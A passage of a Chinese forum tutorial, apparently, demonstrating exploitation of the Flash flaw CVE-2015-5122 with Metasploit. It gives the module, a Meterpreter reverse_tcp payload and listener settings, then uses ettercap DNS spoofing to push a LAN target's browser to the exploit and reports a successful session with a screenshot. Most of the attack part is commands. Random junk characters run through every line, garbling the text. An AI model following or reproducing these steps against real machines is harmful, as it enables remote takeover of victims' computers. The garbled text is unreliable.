" A! }2 S9 S8 F 二、cve2015-5122漏洞实例演示虚拟机 ( [' X% Y8 @$ F$ ^; J
I0 Z! t; ~" I2 X x
, z7 T' {) ]* h1 X G. b6 K
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: ) ?4 w5 _. c) D4 @; X- h$ @
8 r0 `) U5 ~# P$ q
# j( ~1 C: J+ Y7 W% W! D1 J. c8 c search cve-2015-5122如图:
$ V3 p: B& k+ k( Z+ _: [, F - _8 G: I7 M" c: D! ]
" [" N- A b! z4 T9 }
, r9 L" t$ _% h: m* {/ H% J
) ]- X: r! H( Z7 Y+ q6 l0 l0 v6 j8 M' Z5 l# I* W6 V
下面我们敲如下命令:
" r/ b9 V8 { U( k# F) u. ?
0 I$ K; I- ^, n, |7 ]' N; e9 W5 U( |' Q( h5 s8 C
use exploit/multi/browser/adobe_flash_opaque_background_uaf - \, C$ w H$ {9 ^1 z- w C& K, R9 J1 T
' s- X8 g3 _& }; o
# F" E$ X+ m. d% W7 o W set PAYLOAD windows/meterpreter/reverse_tcp
3 ~; r% H9 C: g q% J. x% z% |6 p# ^
: @3 O/ p5 `) u
* W7 j8 [' e6 _# R% q/ o; R set LHOST 192.168.0.109
9 W0 i1 G9 I) `, n: v7 C
8 ]" Z& q, C k% H0 l0 B* N) |/ d G5 w8 P) K r6 f8 b! T
set URIPATH / /*根目录*/ 3 ~, M2 t3 E3 n' R+ _ j
( ^- s. Y. ~/ Y
$ m6 f* f2 ]2 b% @/ `% v set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
1 \. H- b T' f 0 b9 ` Z3 b) K: w5 P. @1 n& z
0 ~3 f+ T+ x* x$ ]) J) C set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ) y# {: E& F1 Z; {* t T
, T: N! s8 v- S q' y: B6 [
8 y; q0 w+ Y! l+ L0 S' U 然后show options如图: - X8 B% U. V/ S5 `6 o. \3 W }1 W
1 q L. ?' T4 h8 T3 j
5 m5 N1 k; ~! d( s, ]1 E: N
0 O% ?* L" r1 P: U- W- i) ` * T6 v( T* r/ _' n3 W' m3 Y0 S
: t6 p& M' G8 h; s& c( o9 q7 m
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: + }* F2 P" r* O* Z$ b* m
2 k! M" l' o; z& f+ u0 p9 {! z& k- O
^* c/ e7 ^- B
" `+ B! P3 F! q" ` 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 " ^/ `( v& M7 Z- V. e
6 Y6 R6 u% P7 t/ A0 K
8 w& Q5 s8 g+ y0 G6 x" e Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf ) d& ?" [! z1 q) H7 V, j+ V
4 X3 B" S. {& v) i3 l
6 r8 a4 |+ U+ I8 r' G
9 L) K6 ?+ M+ o 0 Q [. P* Q$ j) @) p
, Y7 K* H0 w2 i9 n 成功了,这时候我们断开ettercap,如图:
, h# u3 B* B( p: k6 U 6 n" N* C& g. Y! O
: o& Y* z! L& e) o8 g 9 C3 `4 t* @% w0 v ], E
4 N+ Z1 t6 j3 ?3 U6 l6 p' \; W% W: q1 \) \7 P: p2 ~
Screenshot如图: . }( T; g# G h$ y1 @6 I0 c. [$ F$ u0 S
8 C& d; W! A" a0 x
8 X( t( c0 x) y2 X* ^: c $ |* I/ @ P3 e
: L: N- ~! b& j0 v: D, O/ a2 P! r' W# I
! J$ G7 k- d* C1 Y: K+ f* G |